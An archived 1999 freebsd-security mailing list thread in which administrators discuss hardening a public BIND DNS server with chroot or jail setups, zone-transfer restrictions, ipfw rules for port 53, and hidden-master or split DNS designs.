<4.2.0.58.19990823131756.01edf5d0@mail1.dcomm.net>, Deepwell Interne t writes: >I'm not familliar with jail as an admin term or a command. Can you tell me >where I can find more information on this? Is it an admin philosophy or a >tool? > > > > >> >One can also run named in chroot() environment and as non-root user. In >> >fact, this is exactly what we are doing where I work: >> > >> >85-jkb(nautilus)% ssh dns1.corp ps ax | grep named >> > 106 ?? Ss 0:30.01 syslogd -s -l /var/named/dev/log >> >27897 ?? Ss 1047:54.55 /var/named/named -u bind -g bind -t /var/named >> >>Even better yet: Run it in a jail with it's own IP number... >> > > -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:50:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from rapidnet.com (rapidnet.com [205.164.216.1]) by hub.freebsd.org (Postfix) with ESMTP id 3911214E4F for ; Mon, 23 Aug 1999 13:50:49 -0700 (PDT) (envelope-from nick@rapidnet.com) Received: from localhost (nick@localhost) by rapidnet.com (8.9.3/8.9.3) with ESMTP id OAA88696; Mon, 23 Aug 1999 14:48:47 -0600 (MDT) Date: Mon, 23 Aug 1999 14:48:47 -0600 (MDT) From: Nick Rogness To: Nate Williams Cc: "Rodney W. Grimes" , freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules In-Reply-To: <199908232024.OAA01685@mt.sri.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 23 Aug 1999, Nate Williams wrote: > > > > Not a whole lot you can do here, other than keep on top of the latest > > versions of bind from ISC. This is true. Even with blocking xfer-nets your DNS server can still be attacked. The most common one is the DoS attack with version 4.9.7 ... which came shipped with FreeBSD for a while. > > *sigh* Guess Bind is really in the same category as sendmail then. > Unfortunately, BIND has it's hooks all over the system, including the C > library. Can I just install the named and not worry about anything > else, leaving the system the same? The box in question is running > 2.2.8, and I *really* don't want to upgrade it if I can avoid it. I would probably get the new bind 8.9.2 and run that. I don't remember what version of BIND comes with 2.2.8 but I thought it was either 4.9.7 or 8.9.1. If it is 8.9.1, you can also run that with minimal problems. ******************************************************************* Nick Rogness Shaw's Principle: System Administrator Build a system that even a fool RapidNet, INC can use, and only a fool will nick@rapidnet.com want to use it. ******************************************************************* To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:54:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 1A6121501B for ; Mon, 23 Aug 1999 13:54:16 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id NAA36241; Mon, 23 Aug 1999 13:53:41 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908232053.NAA36241@gndrsh.dnsmgr.net> Subject: Re: IPFW/DNS rules In-Reply-To: <199908232024.OAA01685@mt.sri.com> from Nate Williams at "Aug 23, 1999 02:24:01 pm" To: nate@mt.sri.com (Nate Williams) Date: Mon, 23 Aug 1999 13:53:40 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > I have a public DNS server that I need people to be able to query, but > > > is there anything I can do to avoid anyone doing anything 'nasty' to it. > > > > Not a whole lot you can do here, other than keep on top of the latest > > versions of bind from ISC. > > *sigh* Guess Bind is really in the same category as sendmail then. > Unfortunately, BIND has it's hooks all over the system, including the C > library. Can I just install the named and not worry about anything > else, leaving the system the same? The box in question is running > 2.2.8, and I *really* don't want to upgrade it if I can avoid it. Go compile up the latest bind release, do what someone else said about turning this into a non-caching readonly server, I forget what option that is, etc. > (Note, this is a dedicated box w/out any accounts on it, so I don't care > about non-external breakins. You can't get into it w/out SSH logins > anyway....) That makes it easier... > > > > Also, I need to open up access to it to those hosts that secondary me, > > > as well as those I secondary for. > > > > That one is easy, 2 things to do. First, list those who are secondaries > > for zones on this box in the named.conf options {allow_transfer{ip > > list}}; > > .... > > > Second since xfers are done via TCP setup rules to allow only your secondaries > > to ``setup'' connections to your primary, and allow your server to > > ``setup'' connections to the servers it secondaries for. > > Can I setup firewall rules for this as well? Do normal queries require > TCP connections? I'd like to be able to 'shutoff' TCP access to the box > except from my secondaries if at all possible. DNS queries and replies are usually done using udp, if and only if a udp query fails well a client even try a tcp query. You can savely block tcp queries, there just shouldn't really be any. > > Is there anywhere I can find the protocol information aside from using > the source? Any good BIND books? (I've got the O'Reilly TCP book, but > it's way out of date and not much help anymore...) The protocol is documented in a fist full of RFC's, that and the source are the best bet. I don't see why you need to dig much deeper than the fact the DNS talks on udp and tcp port 53 if setup with listen-on and query-source. > > > (I also want to make sure that none of my internal hosts 'leak' DNS > > > stuff, but that they also all go through the DNS server in order to find > > > hosts...) > > > > > > I've got some rules in place, but if someone has gotten DNS firewall > > > rules I'd be grateful to see them. > > > > These rules only log things, they are not meant to stop things, all logs ^^^^^^^^ You didn't pay attention to this very important point about what these rules DO. I also said later on how to change them to do what you wanted. > > are carefully investigated (IP's blacked out to protect the parties and > > myself, A.B.C.D is the inside DNS, W.X.Y.Z is the outside DNS, the other > > 400 rules that don't deal with DNS blacked out as well :-)): > > > > ipfw add 10000 allow tcp from any to any established > > ipfw add 10530 allow tcp from A.B.C.D to W.X.Y.Z 53 setup > > So far so good. You're limiting your firewall to only connect to a > primary/secondary. > > > ipfw add 10539 allow log tcp from any to any 53 > > This seems insecure to me. Any external host can connect to port 53 on > your internal hosts. Also, internal hosts can 'leak' information out > externally. You missed the clause above about ``only log things'', change that rule from ``allow log'' to ``deny log'' and it does just what you wanted. > > > ipfw add 40530 allow udp from any to A.B.C.D 53 > > Fairly secure, as long as BIND on A.B.C.D is secure, which we hafta > assume at some point. :) A.B.C.D is YOUR DNS server, you are in control of how secure it is. > > ipfw add 40530 allow udp from A.B.C.D 53 to any > > ipfw add 40539 allow log udp from any to any 53 > > This is *NOT* secure, just like the TCP port. I'm ignoreing this, you didn't read very carefully. > > > ipfw add 40539 allow log udp from any 53 to any > > This is also insecure, in that it allows anyone to use source port 53 to > connect to *any* UDP port in your network. You have no idea what my other 400 rules do. All those other UDP ports are handled some place else. If you wanted a full firewall rule set, well, that'll be $100/hr... > Am I being paranoid? You betcha. A number of machines at work in > another division were compromised recently, including one running a > commercial firewall. Do I feel safe? Pretty much, but when things like > this happen, you like to go through your system and crank everything > down a couple more notches. :( > Some where right about here was this: To make this work for you change ``allow log'' to ``deny'' or ``deny log''. Now go back to my original mail, make that change on the rules and see how you like them. > > Also the above rules don't include the inside DNS doing zone transfers > > from outside DNS boxes. Add another 10530 rule: > > ipfw add 10530 allow tcp from OUTSIDE to INSIDE 53 setup > > Yep. > > > Hope that helps... > > They look like mine except that my are even more paranoid than yours. I think that statement is false, but without a look at your rules I can't tell you. I am a transit AS, I just can't go abritarily shutting down services, so I do the next best thing, I allow things I expect to go without any logging, but anything else gets logged. These rules are actually built by a huge script that uses tons of variables and 100's of IP address to concoct the minimum rule set to allow what I could care less about and watch EVERYTHING else. > However, I don't like what I have, and was hoping someone could tell me > how to lock things down better. Turn the box off? :-) :-) > Any good books on this? Not really, other than the standard refernces to Building Firewalls, the fwtk documentation. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:58:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id B23FD15794 for ; Mon, 23 Aug 1999 13:58:33 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 99484 invoked by uid 1001); 23 Aug 1999 20:57:48 +0000 (GMT) To: nick@rapidnet.com Cc: nate@mt.sri.com, freebsd@gndrsh.dnsmgr.net, freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules From: sthaug@nethelp.no In-Reply-To: Your message of "Mon, 23 Aug 1999 14:48:47 -0600 (MDT)" References: X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 23 Aug 1999 22:57:47 +0200 Message-ID: <99482.935441867@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I would probably get the new bind 8.9.2 and run that. There is no 8.9.2. Maybe you mean 8.2.2? Not released yet, but it's expected soon. > I don't > remember what version of BIND comes with 2.2.8 4.9.7-T1B > but I thought it > was either 4.9.7 or 8.9.1. If it is 8.9.1, you can also run that > with minimal problems. No such thing as 8.9.1 either. The newest release version if BIND is 8.2.1. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 14: 2:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 0A653157D7 for ; Mon, 23 Aug 1999 14:02:19 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 604 invoked by uid 1001); 23 Aug 1999 21:01:52 +0000 (GMT) To: freebsd@gndrsh.dnsmgr.net Cc: nate@mt.sri.com, freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules From: sthaug@nethelp.no In-Reply-To: Your message of "Mon, 23 Aug 1999 13:53:40 -0700 (PDT)" References: <199908232053.NAA36241@gndrsh.dnsmgr.net> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 23 Aug 1999 23:01:50 +0200 Message-ID: <596.935442110@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > DNS queries and replies are usually done using udp, if and only if a udp > query fails well a client even try a tcp query. You can savely block > tcp queries, there just shouldn't really be any. Life isn't that simple, unfortunately. There are some clients out there that use TCP on a regular basis - early versions of a well known Internet "server in a box" system based on FreeBSD, for instance :-) Blocking TCP queries is not recommended. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 14: 8:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.mt.sri.com (ns.mt.sri.com [206.127.79.91]) by hub.freebsd.org (Postfix) with ESMTP id B30EF15792 for ; Mon, 23 Aug 1999 14:08:36 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id PAA02899; Mon, 23 Aug 1999 15:08:30 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id PAA02230; Mon, 23 Aug 1999 15:08:30 -0600 Date: Mon, 23 Aug 1999 15:08:30 -0600 Message-Id: <199908232108.PAA02230@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: "Rodney W. Grimes" Cc: nate@mt.sri.com (Nate Williams), freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules In-Reply-To: <199908232053.NAA36241@gndrsh.dnsmgr.net> References: <199908232024.OAA01685@mt.sri.com> <199908232053.NAA36241@gndrsh.dnsmgr.net> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@mt.sri.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > > I've got some rules in place, but if someone has gotten DNS firewall > > > > rules I'd be grateful to see them. > > > > > > These rules only log things, they are not meant to stop things, all logs > ^^^^^^^^ You didn't pay attention to this very > important point about what these rules DO. I also said later on how to > change them to do what you wanted. Sorry, you're right. I missed that. > > > ipfw add 10539 allow log tcp from any to any 53 > > > > This seems insecure to me. Any external host can connect to port 53 on > > your internal hosts. Also, internal hosts can 'leak' information out > > externally. > > You missed the clause above about ``only log things'', change that > rule from ``allow log'' to ``deny log'' and it does just what you > wanted. Gotcha. See below. > > > ipfw add 40530 allow udp from any to A.B.C.D 53 > > > > Fairly secure, as long as BIND on A.B.C.D is secure, which we hafta > > assume at some point. :) > > A.B.C.D is YOUR DNS server, you are in control of how secure it is. I know, I was (attempting) to be funny. Obviously I failed. :( > > > ipfw add 40530 allow udp from A.B.C.D 53 to any > > > ipfw add 40539 allow log udp from any to any 53 > > > > This is *NOT* secure, just like the TCP port. > > I'm ignoreing this, you didn't read very carefully. Right, it's the next rule that I *needed* though... > > > > > ipfw add 40539 allow log udp from any 53 to any > > > > This is also insecure, in that it allows anyone to use source port 53 to > > connect to *any* UDP port in your network. > > You have no idea what my other 400 rules do. All those other UDP ports > are handled some place else. If you wanted a full firewall rule set, > well, that'll be $100/hr... I've done my best, but I couldn't figure out a 'clean, effecient, and safe' way of allowing DNS (and NTP, which is in the same boat) to work. The rules before must disallow connections, but I don't see how you can do that and still allow connections from port 53. > > However, I don't like what I have, and was hoping someone could tell me > > how to lock things down better. > > Turn the box off? :-) :-) Yeah, wouldn't that be easy. :) Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 14: 9:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.mt.sri.com (ns.mt.sri.com [206.127.79.91]) by hub.freebsd.org (Postfix) with ESMTP id 0045B15769 for ; Mon, 23 Aug 1999 14:09:15 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id PAA02920; Mon, 23 Aug 1999 15:09:13 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id PAA02237; Mon, 23 Aug 1999 15:09:12 -0600 Date: Mon, 23 Aug 1999 15:09:12 -0600 Message-Id: <199908232109.PAA02237@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: sthaug@nethelp.no Cc: freebsd@gndrsh.dnsmgr.net, nate@mt.sri.com, freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules In-Reply-To: <596.935442110@verdi.nethelp.no> References: <199908232053.NAA36241@gndrsh.dnsmgr.net> <596.935442110@verdi.nethelp.no> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@mt.sri.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > DNS queries and replies are usually done using udp, if and only if a udp > > query fails well a client even try a tcp query. You can savely block > > tcp queries, there just shouldn't really be any. > > Life isn't that simple, unfortunately. There are some clients out there > that use TCP on a regular basis - early versions of a well known Internet > "server in a box" system based on FreeBSD, for instance :-) > > Blocking TCP queries is not recommended. I may just 'log' TCP queries then, to see what's what. If I never get any hits, I will probably later on block them. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 15:17:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 86B0614DFC for ; Mon, 23 Aug 1999 15:17:38 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id PAA36434; Mon, 23 Aug 1999 15:16:38 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908232216.PAA36434@gndrsh.dnsmgr.net> Subject: Re: IPFW/DNS rules In-Reply-To: <596.935442110@verdi.nethelp.no> from "sthaug@nethelp.no" at "Aug 23, 1999 11:01:50 pm" To: sthaug@nethelp.no Date: Mon, 23 Aug 1999 15:16:38 -0700 (PDT) Cc: nate@mt.sri.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > DNS queries and replies are usually done using udp, if and only if a udp > > query fails well a client even try a tcp query. You can savely block > > tcp queries, there just shouldn't really be any. > > Life isn't that simple, unfortunately. There are some clients out there > that use TCP on a regular basis - early versions of a well known Internet > "server in a box" system based on FreeBSD, for instance :-) > > Blocking TCP queries is not recommended. It's not a problem for me, but it may be for Nate. Nothing should be doing public quiries to my master DNS servers, they aren't even listed in the SOA for the zones. The outside and public DNS servers do allow TCP to them, but it is logged, and I haven't seen one in a month, so either the above is not very widely deployed, or they have ``fixed'' it. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 15:34:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 597031580E for ; Mon, 23 Aug 1999 15:34:35 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id PAA36466; Mon, 23 Aug 1999 15:34:21 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908232234.PAA36466@gndrsh.dnsmgr.net> Subject: Re: IPFW/DNS rules In-Reply-To: <199908232108.PAA02230@mt.sri.com> from Nate Williams at "Aug 23, 1999 03:08:30 pm" To: nate@mt.sri.com (Nate Williams) Date: Mon, 23 Aug 1999 15:34:20 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > > > I've got some rules in place, but if someone has gotten DNS firewall > > > > > rules I'd be grateful to see them. > > > > > > > > These rules only log things, they are not meant to stop things, all logs > > ^^^^^^^^ You didn't pay attention to this very > > important point about what these rules DO. I also said later on how to > > change them to do what you wanted. > > Sorry, you're right. I missed that. > > > > > ipfw add 10539 allow log tcp from any to any 53 > > > > > > This seems insecure to me. Any external host can connect to port 53 on > > > your internal hosts. Also, internal hosts can 'leak' information out > > > externally. > > > > You missed the clause above about ``only log things'', change that > > rule from ``allow log'' to ``deny log'' and it does just what you > > wanted. > > Gotcha. See below. > > > > > ipfw add 40530 allow udp from any to A.B.C.D 53 > > > > > > Fairly secure, as long as BIND on A.B.C.D is secure, which we hafta > > > assume at some point. :) > > > > A.B.C.D is YOUR DNS server, you are in control of how secure it is. > > I know, I was (attempting) to be funny. Obviously I failed. :( I missed the :), too few characters for my parser to see it as a smiley, I'll have to go look for the bug in it, must be an off by one error, nope it was a bad regex, needed 3 characters to trigger it, fixed :-) ... > > > > > > > ipfw add 40539 allow log udp from any 53 to any > > > > > > This is also insecure, in that it allows anyone to use source port 53 to > > > connect to *any* UDP port in your network. > > > > You have no idea what my other 400 rules do. All those other UDP ports > > are handled some place else. If you wanted a full firewall rule set, > > well, that'll be $100/hr... > > I've done my best, but I couldn't figure out a 'clean, effecient, and > safe' way of allowing DNS (and NTP, which is in the same boat) to work. > The rules before must disallow connections, but I don't see how you can > do that and still allow connections from port 53. Yes, my rules before these have large blocks of udp/tcp ports that log thier activity, for what you want it would be something like: ipfw add 100 deny log tcp from any 1-52 to any ipfw add 100 deny log tcp from any 54-65535 to any ipfw add 200 deny log udp from any 1-52 to any ipfw add 200 deny log udp from any 54-65565 to any And of cource, the reverse rules ipfw add 300 deny log tcp from any to any 1-52 ipfw add 300 deny log tcp from any to any 54-65535 ipfw add 400 deny log udp from any to any 1-52 ipfw add 400 deny log udp from any to any 54-65535 Now you get what I am doing? The above scripts would in effect shutdown all IP packets except tcp/udp port 53 before it ever hit my other rules. Now, I don't use that wide of port ranges in the real rule set, but there are some pretty big ones that cover a 100 or so ports here and there. > > > > However, I don't like what I have, and was hoping someone could tell me > > > how to lock things down better. > > > > Turn the box off? :-) :-) > > Yeah, wouldn't that be easy. :) Outsource your DNS services so that no public queries ever hit your master would be another way. This is known as a hidden master DNS server, you simply get 2 public secondaries, list them in the SOA for the zone, but leave out the real master. No one even knows to go look at your box, except if they break into the slaves. If you only have a few zones, dnsmgr.net could deal with them for you... -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 15:39:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id 9FE8414CD3 for ; Mon, 23 Aug 1999 15:39:08 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.3/frmug-2.5/nospam) with UUCP id AAA10952; Tue, 24 Aug 1999 00:38:54 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id 5D4F2885E; Tue, 24 Aug 1999 00:35:38 +0200 (CEST) Date: Tue, 24 Aug 1999 00:35:38 +0200 From: Ollivier Robert To: freebsd-security@FreeBSD.ORG Cc: Nate Williams Subject: Re: IPFW/DNS rules Message-ID: <19990824003538.A27031@keltia.freenix.fr> Mail-Followup-To: freebsd-security@FreeBSD.ORG, Nate Williams References: <199908231935.NAA01122@mt.sri.com> <199908232012.NAA36075@gndrsh.dnsmgr.net> <199908232024.OAA01685@mt.sri.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.5i In-Reply-To: <199908232024.OAA01685@mt.sri.com>; from Nate Williams on Mon, Aug 23, 1999 at 02:24:01PM -0600 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5543 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Nate Williams: > This seems insecure to me. Any external host can connect to port 53 on > your internal hosts. Also, internal hosts can 'leak' information out > externally. If you don't want to leak information, use a double DNS. The method is described in B. Chapman's book on firewalls. It is fairly, you have two machines, one serving the external DNS with only a few records and another one, serving the inside DNS. The external machine is _client_ of the internal DNS and the internal DNS is forwarding every query that it doesn't know about to the external one. That way, you can't leak information. Beware that you'll find DNS info in the Received: headers added by your mailservers. You can do it on one machine if you use a very recent bind version because it can bound specific interfaces so you can run two instances of bind. > Any good books on this? See the book from Brent Chapman. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 15:55:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.mt.sri.com (ns.mt.sri.com [206.127.79.91]) by hub.freebsd.org (Postfix) with ESMTP id 2475E14E3F for ; Mon, 23 Aug 1999 15:55:44 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id QAA04165; Mon, 23 Aug 1999 16:55:40 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id QAA02707; Mon, 23 Aug 1999 16:55:34 -0600 Date: Mon, 23 Aug 1999 16:55:34 -0600 Message-Id: <199908232255.QAA02707@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: "Rodney W. Grimes" Cc: nate@mt.sri.com (Nate Williams), freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules In-Reply-To: <199908232234.PAA36466@gndrsh.dnsmgr.net> References: <199908232108.PAA02230@mt.sri.com> <199908232234.PAA36466@gndrsh.dnsmgr.net> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@mt.sri.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > > > ipfw add 40539 allow log udp from any 53 to any > > > > > > > > This is also insecure, in that it allows anyone to use source port 53 to > > > > connect to *any* UDP port in your network. ... > > Yes, my rules before these have large blocks of udp/tcp ports that log > thier activity, for what you want it would be something like: > > ipfw add 100 deny log tcp from any 1-52 to any > ipfw add 100 deny log tcp from any 54-65535 to any > ipfw add 200 deny log udp from any 1-52 to any > ipfw add 200 deny log udp from any 54-65565 to any > > And of cource, the reverse rules > ipfw add 300 deny log tcp from any to any 1-52 > ipfw add 300 deny log tcp from any to any 54-65535 > ipfw add 400 deny log udp from any to any 1-52 > ipfw add 400 deny log udp from any to any 54-65535 Except that you're still allowing connections *from* port 53 to any UDP service in your network, which bothers me. (I'm doing it as well, FWIW, although I'm limiting it to a single box.) *sigh* > Outsource your DNS services so that no public queries ever hit your > master would be another way. This is known as a hidden master DNS > server, you simply get 2 public secondaries, list them in the SOA > for the zone, but leave out the real master. No one even knows to > go look at your box, except if they break into the slaves. Ahh, this is an idea. This is essentially what I'm doing now, except I didn't think to hide the master. However, we are trying to be more and more 'independant' of the parent company, so for now I think we'll deal with the paranoia. Also, I don't trust the people who are my secondaries as much to be secure. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 15:57:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.mt.sri.com (ns.mt.sri.com [206.127.79.91]) by hub.freebsd.org (Postfix) with ESMTP id 14A9D14E3F for ; Mon, 23 Aug 1999 15:57:21 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id QAA04176; Mon, 23 Aug 1999 16:56:55 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id QAA02724; Mon, 23 Aug 1999 16:56:55 -0600 Date: Mon, 23 Aug 1999 16:56:55 -0600 Message-Id: <199908232256.QAA02724@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Ollivier Robert Cc: freebsd-security@FreeBSD.ORG, Nate Williams Subject: Re: IPFW/DNS rules In-Reply-To: <19990824003538.A27031@keltia.freenix.fr> References: <199908231935.NAA01122@mt.sri.com> <199908232012.NAA36075@gndrsh.dnsmgr.net> <199908232024.OAA01685@mt.sri.com> <19990824003538.A27031@keltia.freenix.fr> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@mt.sri.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > This seems insecure to me. Any external host can connect to port 53 on > > your internal hosts. Also, internal hosts can 'leak' information out > > externally. > > If you don't want to leak information, use a double DNS. The method is > described in B. Chapman's book on firewalls. > > It is fairly, you have two machines, one serving the external DNS with only a > few records and another one, serving the inside DNS. The external machine is > _client_ of the internal DNS and the internal DNS is forwarding every query > that it doesn't know about to the external one. > > That way, you can't leak information. > > Beware that you'll find DNS info in the Received: headers added by your > mailservers. Yep, but the mailserver information isn't anything I'm not already exposing via MX records and such. > You can do it on one machine if you use a very recent bind version because it > can bound specific interfaces so you can run two instances of bind. Interesting. Sounds like I need to get the new BIND/TCP book from O'Reilly and the Chapman firewall book. Thanks to all, this was an interesting learning experience for me... Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 16: 8:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 6351F1501A; Mon, 23 Aug 1999 16:08:18 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id QAA18670; Mon, 23 Aug 1999 16:07:10 -0700 (PDT) Received: from utah.XYLAN.COM by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id PAA29248; Mon, 23 Aug 1999 15:59:56 -0700 Received: from softweyr.com by utah.XYLAN.COM (SMI-8.6/SMI-SVR4 (xylan utah [SPOOL])) id RAA28823; Mon, 23 Aug 1999 17:07:06 -0600 Message-ID: 